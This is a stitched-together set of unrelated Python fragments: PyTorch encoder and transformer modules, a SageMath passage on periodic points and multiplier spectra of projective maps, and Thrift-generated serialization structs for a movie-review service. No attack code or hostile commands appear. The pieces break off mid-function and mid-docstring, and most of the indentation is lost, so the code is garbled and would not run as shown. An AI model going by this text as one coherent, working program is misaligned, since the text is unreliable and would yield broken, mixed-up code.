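    count = 0
    while n > 0 and n % 2 == 0:
        n //= 2
        count += 1
    return count
# A minimal usage sketch (added): the encoder halves the length max_depth times
# and the decoder's skip connections restore it exactly. _unet1d_demo is an
# illustrative name.
def _unet1d_demo():
    net = UNet1D(input_channels=96, output_channels=64, max_depth=5)
    x = torch.randn(4, 96, 64)   # L = 64 is divisible by 2^5
    return net(x).shape          # -> torch.Size([4, 64, 64])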
class Unit(nn.Module):
def __init__(self, in_channels, out_channels):
super(Unit, self).__init__()
self.conv = nn.Conv2d(in_channels=in_channels, kernel_size=3, out_channels=out_channels, stride=1, padding=1)
self.bn = nn.BatchNorm2d(num_features=out_channels)
self.relu = nn.ReLU()
def forward(self, input):
output = self.conv(input)
output = self.bn(output)
output = self.relu(output)
return output
class StateEncoder(nn.Module):
def __init__(self,num_classes=1, in_channels = 3):
super().__init__()
#Create 14 layers of the unit with max pooling in between
self.unit1 = Unit(in_channels=in_channels,out_channels=32)
self.unit2 = Unit(in_channels=32, out_channels=32)
self.unit3 = Unit(in_channels=32, out_channels=32)
self.pool1 = nn.MaxPool2d(kernel_size=2)
self.unit4 = Unit(in_channels=32, out_channels=64)
self.unit5 = Unit(in_channels=64, out_channels=64)
self.unit6 = Unit(in_channels=64, out_channels=64)
self.unit7 = Unit(in_channels=64, out_channels=64)
self.pool2 = nn.MaxPool2d(kernel_size=2)
self.unit8 = Unit(in_channels=64, out_channels=128)
self.unit9 = Unit(in_channels=128, out_channels=128)
self.unit10 = Unit(in_channels=128, out_channels=128)
self.unit11 = Unit(in_channels=128, out_channels=128)
self.pool3 = nn.MaxPool2d(kernel_size=2)
self.unit12 = Unit(in_channels=128, out_channels=128)
self.unit13 = Unit(in_channels=128, out_channels=128)
self.unit14 = Unit(in_channels=128, out_channels=128)
self.avgpool = nn.AvgPool2d(kernel_size=4)
#Add all the units into the Sequential layer in exact order
self.net = nn.Sequential(self.unit1, self.unit2, self.unit3, self.pool1, self.unit4, self.unit5, self.unit6
,self.unit7, self.pool2, self.unit8, self.unit9, self.unit10, self.unit11, self.pool3,
self.unit12, self.unit13, self.unit14, self.avgpool)
self.fc = nn.Linear(in_features=512,out_features=256)
def forward(self, state):
output = self.net(state)
output = output.flatten(start_dim=1)
output = self.fc(output)
return output
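# A minimal shape check (added). The fc layer's in_features=512 corresponds to
# 128 channels * 2 * 2 spatial, which assumes 64x64 inputs: 64 -> 32 -> 16 -> 8
# through the three max pools, then 8 -> 2 through AvgPool2d(4). _state_demo is
# an illustrative name.
def _state_demo():
    enc = StateEncoder()
    return enc(torch.randn(2, 3, 64, 64)).shape   # -> torch.Size([2, 256])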
class PositionalEncoding(nn.Module):
def __init__(self, d_model, dropout=0.1, max_len=20):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
def forward(self, x):
        #pdb.set_trace()  # debug breakpoint disabled: it would halt every forward pass
x = x + self.pe[:x.size(0), :]
return self.dropout(x)
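# A minimal usage sketch (added): the module adds fixed sinusoidal position
# embeddings to a sequence-first tensor, i.e. inputs follow the
# (seq_len, batch, d_model) layout expected by nn.Transformer. _pe_demo and its
# shapes are illustrative.
def _pe_demo():
    pe = PositionalEncoding(d_model=50, dropout=0.0, max_len=20)
    src = torch.zeros(10, 4, 50)   # (seq_len, batch, d_model)
    return pe(src).shape           # -> torch.Size([10, 4, 50])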
class DescEncoder_Transformer(nn.Module):
def __init__(self, ntoken = 20, ninp = 50, nhead = 2, nhid = 200, nlayers = 6, dropout=0.2):
super().__init__()
self.model_type = 'Transformer'
self.pos_encoder = PositionalEncoding(ninp, dropout)
encoder_layers = TransformerEncoderLayer(ninp, nhead, nhid, dropout)
self.transformer_encoder = TransformerEncoder(encoder_layers, nlayers)
# self.encoder = nn.Embedding(ntoken, ninp)
self.ninp = ninp
self.decoder = nn.Linear(ninp, ntoken)
#
self.init_weights()
def generate_square_subsequent_mask(self, sz):
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
return mask
def init_weights(self):
initrange = 0.1
#self.encoder.weight.data.uniform_(-initrange, initrange)
self.decoder.bias.data.zero_()
self.decoder.weight.data.uniform_(-initrange, initrange)
def forward(self, src):
# src = self.encoder(src) * math.sqrt(self.ninp)
# src = self.pos_encoder(src)
output = self.transformer_encoder(src)
output = self.decoder(output)
return output
class DescEncoder(nn.Module):
'''
    input_shape: (N, time, text_features: 768), flattened to 15360 features
    output_shape: (N, 256)
'''
def __init__(self, output_feats=64, input_channels=768, kernel_size=None, stride=None, p=0, groups=1):
super().__init__()
self.fc1 = nn.Linear(15360, 4096)
self.fc2 = nn.Linear(4096, 1024)
self.fc3 = nn.Linear(1024, 256)
def forward(self, desc):
desc = torch.flatten(desc, start_dim = 1)
out = torch.relu(self.fc1(desc))
out = torch.relu(self.fc2(out))
out = torch.relu(self.fc3(out))
return out
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, output_size):
super(RNN, self).__init__()
self.hidden_size = hidden_size
self.i2h = nn.Linear(input_size + hidden_size, hidden_size)
self.i2o = nn.Linear(input_size + hidden_size, output_size)
self.softmax = nn.LogSoftmax(dim=1)
def forward(self, input, hidden):
combined = torch.cat((input, hidden), 1)
hidden = self.i2h(combined)
output = self.i2o(combined)
output = self.softmax(output)
return output, hidden
def initHidden(self):
return torch.zeros(1, self.hidden_size)
class DescEncoder_OneHot(nn.Module):
'''
    input_shape: (N, time, text_features: 50), flattened to 1000 features
    output_shape: (N, 256)
'''
def __init__(self, output_feats=64, input_channels=50, kernel_size=None, stride=None, p=0, groups=1):
super().__init__()
self.fc1 = nn.Linear(1000, 768)
self.bn1 = nn.BatchNorm1d(num_features=768)
self.fc2 = nn.Linear(768, 512)
self.bn2 = nn.BatchNorm1d(num_features=512)
self.fc3 = nn.Linear(512, 256)
self.bn3 = nn.BatchNorm1d(num_features=256)
def forward(self, desc):
desc = torch.flatten(desc, start_dim = 1)
out = torch.relu(self.bn1(self.fc1(desc)))
out = torch.relu(self.bn2(self.fc2(out)))
out = torch.relu(self.bn3(self.fc3(out)))
return out
class DescEncoder_BOW(nn.Module):
'''
    input_shape: (N, bag_of_words: 50)
    output_shape: (N, 20)
'''
def __init__(self, output_feats=64, input_channels=50, kernel_size=None, stride=None, p=0, groups=1):
super().__init__()
self.fc1 = nn.Linear(50, 40)
self.bn1 = nn.BatchNorm1d(num_features=40)
self.fc2 = nn.Linear(40, 30)
self.bn2 = nn.BatchNorm1d(num_features=30)
self.fc3 = nn.Linear(30, 20)
self.bn3 = nn.BatchNorm1d(num_features=20)
def forward(self, desc):
desc = torch.flatten(desc, start_dim = 1)
out = torch.relu(self.bn1(self.fc1(desc)))
out = torch.relu(self.bn2(self.fc2(out)))
out = torch.relu(self.bn3(self.fc3(out)))
return out
class DescEncoder_OneHot_RNN(nn.Module):
'''
input_shape: (N, time, text_features: 50)
output_shape: (N, 256, time)
'''
def __init__(self, output_feats=64, input_channels=50, kernel_size=None, stride=None, p=0, groups=1):
super().__init__()
'''
        input 1: (L = sequence length, N = batch size, H = input_size)
input 2: (S = num_layers * num_directions, N, H_out = hidden_size)
>>> rnn = nn.RNN(10, 20, 2)
>>> input = torch.randn(5, 3, 10)
>>> h0 = torch.randn(2, 3, 20)
>>> output, hn = rnn(input, h0)
'''
self.n_hidden = 128
self.n_layers = 20
self.rnn = RNN(50, 32, 20)
def init_hidden(self, batch_size):
# This method generates the first hidden state of zeros which we'll use in the forward pass
# We'll send the tensor holding the hidden state to the device we specified earlier as well
        hidden = torch.zeros(self.n_layers, batch_size, self.n_hidden)
        return hidden
- 3*s^4 + 4*s^3 - 3*s^2 + 2*s - 1 : 1), (1 : 1 : 1),
(s^5 - 2*s^4 + 3*s^3 - 3*s^2 + 3*s - 1 : -s^5 + 3*s^4 - 5*s^3 + 4*s^2 - 4*s + 2 : 1)]
::
sage: P.<x,y,z> = ProjectiveSpace(QQ,2)
sage: H = Hom(P,P)
sage: f = H([x^2 - 21/16*z^2, y^2-2*z^2, z^2])
sage: f.periodic_points(2, False)
[(-5/4 : -1 : 1), (-5/4 : 2 : 1), (-3/4 : -1 : 1), (-3/4 : 2 : 1), (0 : 1 : 0), (1/4 : -1 : 1),
(1/4 : 2 : 1), (1 : 0 : 0), (1 : 1 : 0), (7/4 : -1 : 1), (7/4 : 2 : 1)]
::
sage: P.<x,y,z> = ProjectiveSpace(QQ,2)
sage: H = Hom(P,P)
sage: f = H([x^2 - 21/16*z^2, y^2-2*z^2, z^2])
sage: f.periodic_points(2)
[(-5/4 : -1 : 1), (-5/4 : 2 : 1), (1/4 : -1 : 1), (1/4 : 2 : 1)]
::
sage: set_verbose(None)
sage: P.<x,y> = ProjectiveSpace(ZZ, 1)
sage: H = End(P)
sage: f = H([x^2+y^2,y^2])
sage: f.periodic_points(2, R=QQbar, minimal=False)
[(-0.500000000000000? - 1.322875655532296?*I : 1),
(-0.500000000000000? + 1.322875655532296?*I : 1),
(0.500000000000000? - 0.866025403784439?*I : 1),
(0.500000000000000? + 0.866025403784439?*I : 1),
(1 : 0)]
::
sage: P.<x,y> = ProjectiveSpace(GF(307), 1)
sage: H = End(P)
sage: f = H([x^10+y^10, y^10])
sage: f.periodic_points(16, minimal=True, algorithm='cyclegraph')
[(69 : 1), (185 : 1), (120 : 1), (136 : 1), (97 : 1), (183 : 1),
(170 : 1), (105 : 1), (274 : 1), (275 : 1), (154 : 1), (156 : 1),
(87 : 1), (95 : 1), (161 : 1), (128 : 1)]
::
sage: P.<x,y> = ProjectiveSpace(GF(13^2,'t'),1)
sage: H = End(P)
sage: f = H([x^3 + 3*y^3, x^2*y])
sage: f.periodic_points(30, minimal=True, algorithm='cyclegraph')
[(t + 3 : 1), (6*t + 6 : 1), (7*t + 1 : 1), (2*t + 8 : 1),
(3*t + 4 : 1), (10*t + 12 : 1), (8*t + 10 : 1), (5*t + 11 : 1),
(7*t + 4 : 1), (4*t + 8 : 1), (9*t + 1 : 1), (2*t + 2 : 1),
(11*t + 9 : 1), (5*t + 7 : 1), (t + 10 : 1), (12*t + 4 : 1),
(7*t + 12 : 1), (6*t + 8 : 1), (11*t + 10 : 1), (10*t + 7 : 1),
(3*t + 9 : 1), (5*t + 5 : 1), (8*t + 3 : 1), (6*t + 11 : 1),
(9*t + 12 : 1), (4*t + 10 : 1), (11*t + 4 : 1), (2*t + 7 : 1),
(8*t + 12 : 1), (12*t + 11 : 1)]
::
sage: P.<x,y> = ProjectiveSpace(QQ,1)
sage: H = End(P)
sage: f = H([3*x^2+5*y^2,y^2])
sage: f.periodic_points(2, R=GF(3), minimal=False)
Traceback (most recent call last):
...
NotImplementedError: must be a projective morphism
"""
if n <= 0:
raise ValueError("a positive integer period must be specified")
if not self.is_endomorphism():
raise TypeError("must be an endomorphism")
if R is None:
f = self
R = self.base_ring()
else:
f = self.change_ring(R)
if not f.is_morphism():
# if not, the variety is not dimension 0 and
            # we cannot construct the cyclegraph due to
            # indeterminacies
raise NotImplementedError("must be a projective morphism")
PS = f.codomain()
if algorithm == 'variety':
if R in NumberFields() or R is QQbar or R in FiniteFields():
N = PS.dimension_relative() + 1
R = PS.coordinate_ring()
F = f.nth_iterate_map(n)
L = [F[i]*R.gen(j) - F[j]*R.gen(i) for i in range(0,N) for j in range(i+1, N)]
X = PS.subscheme(L)
points = X.rational_points()
if not minimal:
return points
else:
#we want only the points with minimal period n
#so we go through the list and remove any that
#have smaller period by checking the iterates
                for i in range(len(points)-1,-1,-1):
                    # iterate the point; if it returns to itself in fewer
                    # than n steps, its period is a proper divisor of n
P = points[i]
for j in range(1,n):
P = f(P)
if P == points[i]:
points.pop(i)
break
return points
else:
raise NotImplementedError("ring must a number field or finite field")
elif algorithm == 'cyclegraph':
if R in FiniteFields():
g = f.cyclegraph()
points = []
for cycle in g.all_simple_cycles():
m = len(cycle)-1
if minimal:
if m == n:
points = points + cycle[:-1]
else:
                        # a point on an m-cycle has period n exactly when m divides n
                        if n % m == 0:
                            points = points + cycle[:-1]
                return points
else:
raise TypeError("ring must be finite to generate cyclegraph")
else:
raise ValueError("algorithm must be either 'variety' or 'cyclegraph'")
def multiplier_spectra(self, n, formal=True, embedding=None):
r"""
Computes the formal ``n`` multiplier spectra of this map.
This is the set of multipliers of the periodic points of formal period
``n`` included with the appropriate multiplicity.
        The user can also specify to compute the ``n`` multiplier spectra instead, which includes the
        multipliers of all periodic points of period ``n``. The map must be defined over
projective space of dimension 1 over a number field.
INPUT:
- ``n`` - a positive integer, the period.
- ``formal`` - a Boolean. True specifies to find the formal ``n`` multiplier spectra
of this map. False specifies to find the ``n`` multiplier spectra
of this map. Default: True
- ``embedding`` - embedding of the base field into `\QQbar`
OUTPUT:
- a list of `\QQbar` elements.
EXAMPLES::
sage: P.<x,y> = ProjectiveSpace(QQ,1)
sage: H = End(P)
sage: f = H([4608*x^10 - 2910096*x^9*y + 325988068*x^8*y^2 + 31825198932*x^7*y^3 - 4139806626613*x^6*y^4\
- 44439736715486*x^5*y^5 + 2317935971590902*x^4*y^6 - 15344764859590852*x^3*y^7 + 2561851642765275*x^2*y^8\
+ 113578270285012470*x*y^9 - 150049940203963800*y^10, 4608*y^10])
sage: f.multiplier_spectra(1)
[0, -7198147681176255644585/256, 848446157556848459363/19683, -3323781962860268721722583135/35184372088832,
529278480109921/256, -4290991994944936653/2097152, 1061953534167447403/19683, -3086380435599991/9,
82911372672808161930567/8192, -119820502365680843999, 3553497751559301575157261317/8192]
::
sage: set_verbose(None)
sage: z = QQ['z'].0
sage: K.<w> = NumberField(z^4 - 4*z^2 + 1,'z')
sage: P.<x,y> = ProjectiveSpace(K,1)
sage: H = End(P)
sage: f = H([x^2 - w/4*y^2, y^2])
sage: f.multiplier_spectra(2, False, embedding=K.embeddings(QQbar)[0])
[0,
5.931851652578137? + 0.?e-49*I,
0.0681483474218635? - 1.930649271699173?*I,
0.0681483474218635? + 1.930649271699173?*I]
::
sage: P.<x,y> = ProjectiveSpace(QQ,1)
sage: H = End(P)
sage: f = H([x^2 - 3/4*y^2, y^2])
sage: f.multiplier_spectra(2)
[1]
::
sage: P.<x,y> = ProjectiveSpace(QQ,1)
sage: H = End(P)
sage: f = H([x^2 - 7/4*y^2, y^2])
sage: f.multiplier_spectra(3)
[1, 1]
"""
PS = self.domain()
n = Integer(n)
if (n < 1):
raise ValueError("period must be a positive integer")
from sage.schemes.projective.projective_space import is_ProjectiveSpace
if not is_ProjectiveSpace(PS):
raise NotImplementedError("not implemented for subschemes")
if (PS.dimension_relative() > 1):
            raise NotImplementedError("only implemented for dimension 1")
if not self.is_endomorphism():
raise TypeError("self must be an endomorphism")
if not PS.base_ring() in NumberFields() and not PS.base_ring() is QQbar:
raise NotImplementedError("self must be a map over a number field")
if embedding is None:
f = self.change_ring(QQbar)
else:
f = self.change_ring(embedding)
PS = f.domain()
if not formal:
G = f.nth_iterate_map(n)
F = G[0]*PS.gens()[1] - G[1]*PS.gens()[0]
else:
# periodic points of formal period n are the roots of the nth dynatomic polynomial
K = f._number_field_from_algebraics()
F = K.dynatomic_polynomial(n)
if K.domain().base_ring() != QQ: # need to coerce F to poly over QQbar. This is only needed if base ring is not QQ
abspoly = K.domain().base_ring().absolute_polynomial()
phi = K.domain().base_ring().hom(QQbar.polynomial_root(abspoly,abspoly.any_root(CIF)),QQbar)
Kx = K.coordinate_ring()
QQbarx = QQbar[Kx.variable_names()]
phix = Kx.hom(phi,QQbarx)
F = phix(F)
other_roots = F([(f.domain().gens()[0]),1]).univariate_polynomial().roots(ring=QQbar)
points = []
minfty = min([e[1] for e in F.exponents()]) # include the point at infinity with the right multiplicity
for i in range(minfty):
points.append(PS([1,0]))
for R in other_roots:
for i in range(R[1]):
points.append(PS([R[0],1])) # include copies of higher multiplicity roots
newpoints = [] # should include one representative point per cycle, included with the right multiplicity
        while points:
P = points[0]
newpoints.append(P)
points.pop(0)
Q = P
for i in range(1,n):
try:
points.remove(f(Q))
except ValueError:
pass
Q = f(Q)
multipliers = [f.multiplier(P,n)[0,0] for P in newpoints]
return multipliers
def sigma_invariants(self, n, formal=True, embedding=None):
r"""
        Computes the values of the elementary symmetric polynomials of the formal ``n`` multiplier spectra
of this map.
Can specify to instead compute the values corresponding to the elementary symmetric
polynomials of the ``n`` multiplier spectra, which includes the multipliers of all periodic
        points of period ``n``. The map must be defined over projective space of dimension 1 over a number field.
#
# Autogenerated by Thrift Compiler (0.12.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
from thrift.transport import TTransport
all_structs = []
class ErrorCode(object):
SE_THRIFT_CONNPOOL_TIMEOUT = 0
SE_THRIFT_CONN_ERROR = 1
SE_UNAUTHORIZED = 2
SE_MEMCACHED_ERROR = 3
SE_MONGODB_ERROR = 4
SE_REDIS_ERROR = 5
SE_THRIFT_HANDLER_ERROR = 6
_VALUES_TO_NAMES = {
0: "SE_THRIFT_CONNPOOL_TIMEOUT",
1: "SE_THRIFT_CONN_ERROR",
2: "SE_UNAUTHORIZED",
3: "SE_MEMCACHED_ERROR",
4: "SE_MONGODB_ERROR",
5: "SE_REDIS_ERROR",
6: "SE_THRIFT_HANDLER_ERROR",
}
_NAMES_TO_VALUES = {
"SE_THRIFT_CONNPOOL_TIMEOUT": 0,
"SE_THRIFT_CONN_ERROR": 1,
"SE_UNAUTHORIZED": 2,
"SE_MEMCACHED_ERROR": 3,
"SE_MONGODB_ERROR": 4,
"SE_REDIS_ERROR": 5,
"SE_THRIFT_HANDLER_ERROR": 6,
}
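# A small lookup sketch (added): the generated maps translate enum values to
# names and back, e.g.
#   ErrorCode._VALUES_TO_NAMES[2]                -> 'SE_UNAUTHORIZED'
#   ErrorCode._NAMES_TO_VALUES['SE_REDIS_ERROR'] -> 5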
class User(object):
"""
Attributes:
- user_id
- first_name
- last_name
- username
- password
- salt
"""
    def __init__(self, user_id=None, first_name=None, last_name=None, username=None, password=None, salt=None,):
self.user_id = user_id
self.first_name = first_name
self.last_name = last_name
self.username = username
self.password = password
self.salt = salt
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.user_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.first_name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.last_name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.username = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.password = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.salt = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('User')
if self.user_id is not None:
oprot.writeFieldBegin('user_id', TType.I64, 1)
oprot.writeI64(self.user_id)
oprot.writeFieldEnd()
if self.first_name is not None:
oprot.writeFieldBegin('first_name', TType.STRING, 2)
oprot.writeString(self.first_name.encode('utf-8') if sys.version_info[0] == 2 else self.first_name)
oprot.writeFieldEnd()
if self.last_name is not None:
oprot.writeFieldBegin('last_name', TType.STRING, 3)
oprot.writeString(self.last_name.encode('utf-8') if sys.version_info[0] == 2 else self.last_name)
oprot.writeFieldEnd()
if self.username is not None:
oprot.writeFieldBegin('username', TType.STRING, 4)
oprot.writeString(self.username.encode('utf-8') if sys.version_info[0] == 2 else self.username)
oprot.writeFieldEnd()
if self.password is not None:
oprot.writeFieldBegin('password', TType.STRING, 5)
oprot.writeString(self.password.encode('utf-8') if sys.version_info[0] == 2 else self.password)
oprot.writeFieldEnd()
if self.salt is not None:
oprot.writeFieldBegin('salt', TType.STRING, 6)
oprot.writeString(self.salt.encode('utf-8') if sys.version_info[0] == 2 else self.salt)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
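# A minimal serialization roundtrip sketch (added, not generated code; the field
# values are illustrative). It uses the plain TBinaryProtocol, whose
# _fast_encode/_fast_decode are None, so the slow read/write paths above run and
# the module's trailing thrift_spec definitions (truncated from this excerpt)
# are never consulted.
def _user_roundtrip():
    from thrift.protocol import TBinaryProtocol
    buf = TTransport.TMemoryBuffer()
    user = User(user_id=1, first_name='Ada', last_name='Lovelace',
                username='ada', password='hashed', salt='s')
    user.write(TBinaryProtocol.TBinaryProtocol(buf))
    decoded = User()
    decoded.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(buf.getvalue())))
    return decoded == user   # field-wise __eq__ defined above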
class Review(object):
"""
Attributes:
- review_id
- user_id
- req_id
- text
- movie_id
- rating
- timestamp
"""
def __init__(self, review_id=None, user_id=None, req_id=None, text=None, movie_id=None, rating=None, timestamp=None,):
self.review_id = review_id
self.user_id = user_id
self.req_id = req_id
self.text = text
self.movie_id = movie_id
self.rating = rating
self.timestamp = timestamp
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.review_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.user_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.req_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.text = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.movie_id = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I32:
self.rating = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I64:
self.timestamp = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('Review')
if self.review_id is not None:
oprot.writeFieldBegin('review_id', TType.I64, 1)
oprot.writeI64(self.review_id)
oprot.writeFieldEnd()
if self.user_id is not None:
oprot.writeFieldBegin('user_id', TType.I64, 2)
oprot.writeI64(self.user_id)
oprot.writeFieldEnd()
if self.req_id is not None:
oprot.writeFieldBegin('req_id', TType.I64, 3)
oprot.writeI64(self.req_id)
oprot.writeFieldEnd()
if self.text is not None:
oprot.writeFieldBegin('text', TType.STRING, 4)
oprot.writeString(self.text.encode('utf-8') if sys.version_info[0] == 2 else self.text)
oprot.writeFieldEnd()
if self.movie_id is not None:
oprot.writeFieldBegin('movie_id', TType.STRING, 5)
oprot.writeString(self.movie_id.encode('utf-8') if sys.version_info[0] == 2 else self.movie_id)
oprot.writeFieldEnd()
if self.rating is not None:
oprot.writeFieldBegin('rating', TType.I32, 6)
oprot.writeI32(self.rating)
oprot.writeFieldEnd()
if self.timestamp is not None:
oprot.writeFieldBegin('timestamp', TType.I64, 7)
oprot.writeI64(self.timestamp)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CastInfo(object):
"""
Attributes:
- cast_info_id
- name
- gender
- intro
"""
def __init__(self, cast_info_id=None, name=None, gender=None, intro=None,):
self.cast_info_id = cast_info_id
self.name = name
self.gender = gender
self.intro = intro
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.cast_info_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.BOOL:
self.gender = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.intro = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('CastInfo')
if self.cast_info_id is not None:
oprot.writeFieldBegin('cast_info_id', TType.I64, 1)
oprot.writeI64(self.cast_info_id)
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name.encode('utf-8') if sys.version_info[0] == 2 else self.name)
oprot.writeFieldEnd()
if self.gender is not None:
oprot.writeFieldBegin('gender', TType.BOOL, 3)
oprot.writeBool(self.gender)
oprot.writeFieldEnd()
if self.intro is not None:
oprot.writeFieldBegin('intro', TType.STRING, 4)
oprot.writeString(self.intro.encode('utf-8') if sys.version_info[0] == 2 else self.intro)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Cast(object):
"""
Attributes:
- cast_id
- character
- cast_info_id
"""
def __init__(self, cast_id=None, character=None, cast_info_id=None,):
self.cast_id = cast_id
self.character = character
self.cast_info_id = cast_info_id
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.cast_id = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.character = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.cast_info_id = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('Cast')
if self.cast_id is not None:
oprot.writeFieldBegin('cast_id', TType.I32, 1)
oprot.writeI32(self.cast_id)
oprot.writeFieldEnd()
if self.character is not None:
oprot.writeFieldBegin('character', TType.STRING, 2)
oprot.writeString(self.character.encode('utf-8') if sys.version_info[0] == 2 else self.character)
oprot.writeFieldEnd()
if self.cast_info_id is not None:
oprot.writeFieldBegin('cast_info_id', TType.I64, 3)
oprot.writeI64(self.cast_info_id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class MovieInfo(object):
"""
Attributes:
- movie_id
- title
- casts
- plot_id
- thumbnail_ids
- photo_ids
- video_ids
- avg_rating
- num_rating
"""
